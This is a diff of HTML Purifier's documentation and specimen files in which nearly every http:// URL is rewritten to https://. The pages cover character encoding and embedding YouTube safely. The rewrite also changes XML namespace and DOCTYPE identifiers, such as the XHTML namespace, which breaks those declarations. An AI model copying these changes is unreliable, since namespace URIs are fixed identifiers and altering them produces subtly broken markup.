<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Character encoding and character sets are not that
difficult to understand, but so many people blithely stumble
@@ -217,7 +217,7 @@ if your <code>META</code> tag claims that either:</p>
<p class="aside">The advice given here is for pages being served as
vanilla <code>text/html</code>. Different practices must be used
for <code>application/xml</code> or <code>application/xml+xhtml</code>, see
<a href="http://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's
<a href="https://www.w3.org/TR/2002/NOTE-xhtml-media-types-20020430/">W3C's
document on XHTML media types</a> for more information.</p>
<p>If your <code>META</code> encoding and your real encoding match,
@@ -237,7 +237,7 @@ of your real encoding.</p>
has to guess: and sometimes the guess is wrong. Hackers can manipulate
this guess in order to slip XSS past filters and then fool the
browser into executing it as active code. A great example of this
is the <a href="http://shiflett.org/archive/177">Google UTF-7
is the <a href="https://shiflett.org/archive/177">Google UTF-7
exploit</a>.</p>
<p>You might be able to get away with not specifying a character
encoding with the <code>META</code> tag as long as your webserver
@@ -299,10 +299,10 @@ is slightly more difficult.</p>
yourself, via your programming language. Since you're using HTML
Purifier, I'll assume PHP, although it's not too difficult to do
similar things in
<a href="http://www.w3.org/International/O-HTTP-charset#scripting">other
<a href="https://www.w3.org/International/O-HTTP-charset#scripting">other
languages</a>. The appropriate code is:</p>
<pre><a href="http://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre>
<pre><a href="https://php.net/function.header">header</a>('Content-Type:text/html; charset=UTF-8');</pre>
<p>...replacing UTF-8 with whatever your embedded encoding is.
This code must come before any output, so be careful about
@@ -312,16 +312,16 @@ output excluding whitespace within &lt;?php ?&gt; tags).</p>
<h4 id="fixcharset-server-phpini">PHP ini directive</h4>
<p>PHP also has a neat little ini directive that can save you a
header call: <code><a href="http://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p>
header call: <code><a href="https://php.net/ini.core#ini.default-charset">default_charset</a></code>. Using this code:</p>
<pre><a href="http://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre>
<pre><a href="https://php.net/function.ini_set">ini_set</a>('default_charset', 'UTF-8');</pre>
<p>...will also do the trick. If PHP is running as an Apache module (and
not as FastCGI, consult
<a href="http://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property
<a href="https://php.net/phpinfo">phpinfo</a>() for details), you can even use htaccess to apply this property
across many PHP files:</p>
<pre><a href="http://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset &quot;UTF-8&quot;</pre>
<pre><a href="https://php.net/configuration.changes#configuration.changes.apache">php_value</a> default_charset &quot;UTF-8&quot;</pre>
<blockquote class="aside"><p>As with all INI directives, this can
also go in your php.ini file. Some hosting providers allow you to customize
@@ -340,11 +340,11 @@ techniques may work, or may not work.</p>
<p>On Apache, you can use an .htaccess file to change the character
encoding. I'll defer to
<a href="http://www.w3.org/International/questions/qa-htaccess-charset">W3C</a>
<a href="https://www.w3.org/International/questions/qa-htaccess-charset">W3C</a>
for the in-depth explanation, but it boils down to creating a file
named .htaccess with the contents:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/mod_mime.html#addcharset">AddCharset</a> UTF-8 .html</pre>
<p>Where UTF-8 is replaced with the character encoding you want to
use and .html is a file extension that this will be applied to. This
@@ -353,7 +353,7 @@ or in the subdirectories of directory you place this file in.</p>
<p>If you're feeling particularly courageous, you can use:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> UTF-8</pre>
<p>...which changes the character set Apache adds to any document that
doesn't have any Content-Type parameters. This directive, which the
@@ -363,7 +363,7 @@ with the <code>META</code> tag. If you would prefer Apache not to be
butting in on your character encodings, you can tell it not
to send anything at all:</p>
<pre><a href="http://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre>
<pre><a href="https://httpd.apache.org/docs/1.3/mod/core.html#adddefaultcharset">AddDefaultCharset</a> Off</pre>
<p>...making your internal charset declaration (usually the <code>META</code> tags)
the sole source of character encoding
@@ -445,7 +445,7 @@ overrides the <code>META</code> tag. In reality, this happens only when the
XHTML is actually served as legit XML and not HTML, which is almost always
never due to Internet Explorer's lack of support for
<code>application/xhtml+xml</code> (even though doing so is often
argued to be <a href="http://www.hixie.ch/advocacy/xhtml">good
argued to be <a href="https://www.hixie.ch/advocacy/xhtml">good
practice</a> and is required by the XHTML 1.1 specification).</p>
<p>For XML, however, this XML Declaration is extremely important.
@@ -554,7 +554,7 @@ when it became far to cumbersome to support foreign languages. Bots
will now actually go through articles and convert character entities
to their corresponding real characters for the sake of user-friendliness
and searchability. See
<a href="http://meta.wikimedia.org/wiki/Help:Special_characters">Meta's
<a href="https://meta.wikimedia.org/wiki/Help:Special_characters">Meta's
page on special characters</a> for more details.
</p></blockquote>
@@ -575,7 +575,7 @@ which may be used by POST, and is required when you want to upload
files.</p>
<p>The following is a summarization of notes from
<a href="http://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html">
<a href="https://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html">
<code>FORM</code> submission and i18n</a>. That document contains lots
of useful information, but is written in a rambly manner, so
here I try to get right to the point. (Note: the original has
@@ -589,7 +589,7 @@ looks something like: <code>%C3%86</code>. There is no official way of
determining the character encoding of such a request, since the percent
encoding operates on a byte level, so it is usually assumed that it
is the same as the encoding the page containing the form was submitted
in. (<a href="http://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a>
in. (<a href="https://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a>
recommends that textual identifiers be translated to UTF-8; however, browser
compliance is spotty.) You'll run into very few problems
if you only use characters in the character encoding you chose.</p>
@@ -762,7 +762,7 @@ knows about the change too. There are some caveats though:</p>
encodings is notoriously spotty. Refer to your respective database's
documentation on how to do this properly.</p>
<p>For <a href="http://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the
<p>For <a href="https://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the
character encoding conversion for you. However, you have
to make sure that the text inside the column is what is says it is:
if you had put Shift-JIS in an ISO 8859-1 column, MySQL will irreversibly mangle
@@ -772,7 +772,7 @@ and then finally to UTF-8. Many a website had pages irreversibly mangled
because they didn't realize that they'd been deluding themselves about
the character encoding all along; don't become the next victim.</p>
<p>For <a href="http://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the
<p>For <a href="https://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the
encoding of a database (as of 8.2). You will have to dump the data, and then reimport
it into a new table. Make sure that your client encoding is set properly:
this is how PostgreSQL knows to perform an encoding conversion.</p>
@@ -832,15 +832,15 @@ converting reams of existing text and HTML files into UTF-8, as well as
making sure that all new files uploaded are properly encoded. Once again,
I can only point vaguely in the right direction for converting your
existing files: make sure you backup, make sure you use
<a href="http://php.net/ref.iconv">iconv</a>(), and
<a href="https://php.net/ref.iconv">iconv</a>(), and
make sure you know what the original character encoding of the files
is (or are, depending on the tidiness of your system).</p>
<p>However, I can proffer more specific advice on the subject of
text editors. Many text editors have notoriously spotty Unicode support.
To find out how your editor is doing, you can check out <a
href="http://www.alanwood.net/unicode/utilities_editors.html">this list</a>
or <a href="http://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a>
href="https://www.alanwood.net/unicode/utilities_editors.html">this list</a>
or <a href="https://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a>
I personally use Notepad++, which works like a charm when it comes to UTF-8.
Usually, you will have to <strong>explicitly</strong> tell the editor through some dialogue
(usually Save as or Format) what encoding you want it to use. An editor
@@ -859,7 +859,7 @@ BOM below.</p>
<h3 id="migrate-bom">Byte Order Mark (headers already sent!)</h3>
<p>The BOM, or <a href="http://en.wikipedia.org/wiki/Byte_Order_Mark">Byte
<p>The BOM, or <a href="https://en.wikipedia.org/wiki/Byte_Order_Mark">Byte
Order Mark</a>, is a magical, invisible character placed at
the beginning of UTF-8 files to tell people what the encoding is and
what the endianness of the text is. It is also unnecessary.</p>
@@ -917,7 +917,7 @@ anyway. So we'll deal with the other two edge cases.</p>
would like to read your website but get heaps of question marks or
other meaningless characters. Fixing this problem requires the
installation of a font or language pack which is often highly
dependent on what the language is. <a href="http://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a>
dependent on what the language is. <a href="https://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a>
of such a help file for the Bengali language; I am sure there are
others out there too. You just have to point users to the appropriate
help file.</p>
@@ -927,7 +927,7 @@ help file.</p>
<p>A prime example of when you'll see some very obscure Unicode
characters embedded in what otherwise would be very bland ASCII are
letters of the
<a href="http://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International
<a href="https://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International
Phonetic Alphabet (IPA)</a>, use to designate pronunciations in a very standard
manner (you probably see them all the time in your dictionary). Your
average font probably won't have support for all of the IPA characters
@@ -947,10 +947,10 @@ to known good Unicode fonts.</p>
<p>Fortunately, the folks over at Wikipedia have already done all the
heavy lifting for you. Get the CSS from the horses mouth here:
<a href="http://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>,
<a href="https://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>,
and search for &quot;.IPA&quot; There are also a smattering of
other classes you can use for other purposes, check out
<a href="http://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a>
<a href="https://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a>
for more details. For you lazy ones, this should work:</p>
<pre>.Unicode {
@@ -964,7 +964,7 @@ for more details. For you lazy ones, this should work:</p>
<p>The standard usage goes along the lines of <code>&lt;span class=&quot;Unicode&quot;&gt;Crazy
Unicode stuff here&lt;/span&gt;</code>. Characters in the
<a href="http://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a>
<a href="https://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a>
usually don't need to be fixed, but for anything else you probably
want to play it safe. Unless, of course, you don't care about IE6
users.</p>
@@ -994,10 +994,10 @@ and yes, it is variable width. Other traits:</p>
<p>Each of these traits affect different domains of text processing
in different ways. It is beyond the scope of this document to explain
what precisely these implications are. PHPWact provides
a very good <a href="http://www.phpwact.org/php/i18n/utf-8">reference document</a>
a very good <a href="https://www.phpwact.org/php/i18n/utf-8">reference document</a>
on what to expect from each function, although coverage is spotty in
some areas. Their more general notes on
<a href="http://www.phpwact.org/php/i18n/charsets">character sets</a>
<a href="https://www.phpwact.org/php/i18n/charsets">character sets</a>
are also worth looking at for information on UTF-8. Some rules of thumb
when dealing with Unicode text:</p>
@@ -1024,7 +1024,7 @@ usually won't matter since substr() also operates with byte indices!</p>
<p>You'll also need to make sure your UTF-8 is well-formed and will
probably need replacements for some of these functions. I recommend
using Harry Fuecks' <a href="http://phputf8.sourceforge.net/">PHP
using Harry Fuecks' <a href="https://phputf8.sourceforge.net/">PHP
UTF-8</a> library, rather than use mb_string directly. HTML Purifier
also defines a few useful UTF-8 compatible functions: check out
<code>Encoder.php</code> in the <code>/library/HTMLPurifier/</code>
@@ -1042,12 +1042,12 @@ UTF-8 and internationalization, and I would like to defer to them for
a more in-depth look into character sets and encodings.</p>
<ul>
<li><a href="http://www.joelonsoftware.com/articles/Unicode.html">
<li><a href="https://www.joelonsoftware.com/articles/Unicode.html">
The Absolute Minimum Every Software Developer Absolutely,
Positively Must Know About Unicode and Character Sets
(No Excuses!)</a> by Joel Spolsky, provides a <em>very</em>
good high-level look at Unicode and character sets in general.</li>
<li><a href="http://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>,
<li><a href="https://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>,
provides a lot of useful details into the innards of UTF-8, although
it may be a little off-putting to people who don't know much
about Unicode to begin with.</li>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains how to safely allow the embedding of flash from trusted sites in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Clients like their YouTube videos. It gives them a warm fuzzy feeling when
they see a neat little embedded video player on their websites that can play
@@ -26,7 +26,7 @@ content in their pages is something that a lot of people like.</p>
<p>This is a <em>bad</em> idea. The moment you embed anything untrusted,
you will definitely be slammed by a manner of nasties that can be
embedded in things from your run of the mill Flash movie to
<a href="http://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>.
<a href="https://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>.
Even <code>img</code> tags, which HTML Purifier allows by default, can be
dangerous. Be distrustful of anything that tells a browser to load content
from another website automatically.</p>
@@ -48,9 +48,9 @@ into your documents. YouTube's code goes like this:</p>
<pre>
&lt;object width=&quot;425&quot; height=&quot;350&quot;&gt;
&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/AyPzM5WK8ys&quot; /&gt;
&lt;param name=&quot;movie&quot; value=&quot;https://www.youtube.com/v/AyPzM5WK8ys&quot; /&gt;
&lt;param name=&quot;wmode&quot; value=&quot;transparent&quot; /&gt;
&lt;embed src=&quot;http://www.youtube.com/v/AyPzM5WK8ys&quot;
&lt;embed src=&quot;https://www.youtube.com/v/AyPzM5WK8ys&quot;
type=&quot;application/x-shockwave-flash&quot;
wmode=&quot;transparent&quot; width=&quot;425&quot; height=&quot;350&quot; /&gt;
&lt;/object&gt;
@@ -70,7 +70,7 @@ into your documents. YouTube's code goes like this:</p>
class=&quot;youtube-embed&quot;&gt;AyPzM5WK8ys&lt;/span&gt;</code> your
application can reconstruct the full object from this small snippet that
passes through HTML Purifier <em>unharmed</em>.
<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p>
<a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p>
<p>And the corresponding usage:</p>
@@ -124,9 +124,9 @@ number.</p>
tech-savvy enough people not to allow their users to inject malicious
code into the Flash files. An exploit on YouTube means an exploit on your
site. Even though YouTube is run by the reputable Google, it
<a href="http://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a>
<a href="https://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a>
mean they are
<a href="http://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a>
<a href="https://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a>
You're putting a certain measure of the job on an external provider (just as
you have by entrusting your user input to HTML Purifier), and
it is important that you are cognizant of the risk.</p>


@@ -6,7 +6,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLlat1 PUBLIC
"-//W3C//ENTITIES Latin 1 for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent">
%HTMLlat1;
-->


@@ -3,7 +3,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLspecial PUBLIC
"-//W3C//ENTITIES Special for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent">
%HTMLspecial;
-->


@@ -3,7 +3,7 @@
<!-- Character entity set. Typical invocation:
<!ENTITY % HTMLsymbol PUBLIC
"-//W3C//ENTITIES Symbols for XHTML//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent">
"https://www.w3.org/TR/xhtml1/DTD/xhtml-symbol.ent">
%HTMLsymbol;
-->


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Index to all HTML Purifier documentation." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -13,7 +13,7 @@
<h1>Documentation</h1>
<p><strong><a href="http://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people.
<p><strong><a href="https://htmlpurifier.org/">HTML Purifier</a></strong> has documentation for all types of people.
Here is an index of all of them.</p>
<h2>End-user</h2>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Proposal to allow for color constraints in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under Proposals</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Your website probably has a color-scheme.
<span style="color:#090; background:#FFF;">Green on white</span>,


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Credits and links to DevNetwork forum topics on HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,27 +15,27 @@
<div id="filing">Filed under Reference</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Many thanks to the DevNetwork community for answering questions,
theorizing about design, and offering encouragement during
the development of this library in these forum threads:</p>
<ul>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li>
<li><a href="http://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li>
<li><a href="https://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li>
</ul>
<p>...as well as any I may have forgotten.</p>


@@ -5,7 +5,7 @@ WARNING: This document was drafted before the implementation of this
system, and some implementation details may have evolved over time.
HTML Purifier uses the modularization of XHTML
<http://www.w3.org/TR/xhtml-modularization/> to organize the internals
<https://www.w3.org/TR/xhtml-modularization/> to organize the internals
of HTMLDefinition into a more manageable and extensible fashion. Rather
than have one super-object, HTMLDefinition is split into HTMLModules,
each of which are responsible for defining elements, their attributes,


@@ -4,7 +4,7 @@ Web Hypertext Application Technology Working Group
== HTML 5 ==
URL: http://www.whatwg.org/specs/web-apps/current-work/
URL: https://www.whatwg.org/specs/web-apps/current-work/
HTML 5 defines a kaboodle of new elements and attributes, as well as
some well-defined, "quirks mode" HTML parsing. Although WHATWG professes
@@ -19,7 +19,7 @@ committing ourselves till the spec stabilizes, though.
More immediately speaking though, however, is the well-defined parsing
behavior that HTML 5 adds. While I have little interest in writing
another DirectLex parser, other parsers like ph5p
<http://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more
<https://jero.net/lab/ph5p/> can be adapted to DOMLex to support much more
flexible HTML parsing (a cool feature I've seen is how they resolve
<b>bold<i>both</b>italic</i>).


@@ -3,7 +3,7 @@ Licensing of Specimens
Some files in this directory have different licenses:
windows-live-mail-desktop-beta.html - donated by laacz, public domain
img.png - LGPL, from <http://commons.wikimedia.org/wiki/Image:Pastille_chrome.png>
img.png - LGPL, from <https://commons.wikimedia.org/wiki/Image:Pastille_chrome.png>
All other files are by me, and are licensed under LGPL.


@@ -1,5 +1,5 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
"https://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>HTML align attribute to CSS - HTML Purifier Specimen</title>


@@ -1,4 +1,4 @@
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="https://schemas.microsoft.com/office/2004/12/omml" xmlns="https://www.w3.org/TR/REC-html40">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
@@ -102,8 +102,8 @@ style='color:windowtext'>mail@example.com</span></a><o:p></o:p></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Fax&nbsp; : +xx xx xxx xx xx<o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Internet : </span><span
style='color:black'><a href="http://www.example.com/"><span lang=EN-US
style='color:black'>http://www.example.com</span></a></span><span
style='color:black'><a href="https://www.example.com/"><span lang=EN-US
style='color:black'>https://www.example.com</span></a></span><span
lang=EN-US style='color:black'><o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='color:black'>Kamer van koophandel
@@ -114,10 +114,10 @@ xxxxxxxxx<o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US style='font-size:7.5pt;color:black'>Op deze
e-mail is een disclaimer van toepassing, ga naar </span><span lang=EN-US
style='font-size:7.5pt'><a
href="http://www.example.com/disclaimer"><span
href="https://www.example.com/disclaimer"><span
style='color:black'>www.example.com/disclaimer</span></a><br>
<span style='color:black'>A disclaimer is applicable to this email, please
refer to </span><a href="http://www.example.com/disclaimer"><span
refer to </span><a href="https://www.example.com/disclaimer"><span
style='color:black'>www.example.com/disclaimer</span></a><o:p></o:p></span></p>
<p class=MsoNormal><span lang=EN-US><o:p>&nbsp;</o:p></span></p>


@@ -12,7 +12,7 @@ name="Compose message area" acc_role="text" CanvasTabStop="false">
style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; WIDTH: 100%; MARGIN-RIGHT: 10px; PADDING-TOP: 5px; BORDER-BOTTOM: #dddddd 1px solid; FONT-FAMILY: Verdana; HEIGHT: 25px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN
title="View a slideshow of the pictures in this e-mail message."
style="PADDING-RIGHT: 20px"><A style="COLOR: #0088e4"
href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216">Play
href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216">Play
slideshow </A></SPAN><SPAN style="COLOR: #909090"><SPAN>|</SPAN><SPAN
style="PADDING-LEFT: 20px"> Download the highest quality version of a picture by
clicking the + above it </SPAN></SPAN></NOBR></DIV>
@@ -29,9 +29,9 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%;
<UL>
<LI>Buletets
<LI>
<DIV align=justify><A title=http://laacz.lv/blog/
href="http://laacz.lv/blog/">http://laacz.lv/blog/</A> un <A
title=http://google.com/ href="http://google.com/">gugle</A></DIV>
<DIV align=justify><A title=https://laacz.lv/blog/
href="https://laacz.lv/blog/">https://laacz.lv/blog/</A> un <A
title=https://google.com/ href="https://google.com/">gugle</A></DIV>
<LI>Sarakstucitis</LI></UL></DIV><SPAN><SPAN xmlns:canvas="canvas-namespace-id"
layoutEmptyTextWellFont="Tahoma"><SPAN
style="MARGIN-BOTTOM: 15px; OVERFLOW: visible; HEIGHT: 16px"></SPAN><SPAN
@@ -46,11 +46,11 @@ style="MARGIN-BOTTOM: 25px; VERTICAL-ALIGN: top; OVERFLOW: visible; MARGIN-RIGHT
id=HiresARef
title="Click here to view or download a high resolution version of this picture"
style="COLOR: #0088e4; TEXT-DECORATION: none"
href="http://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV>
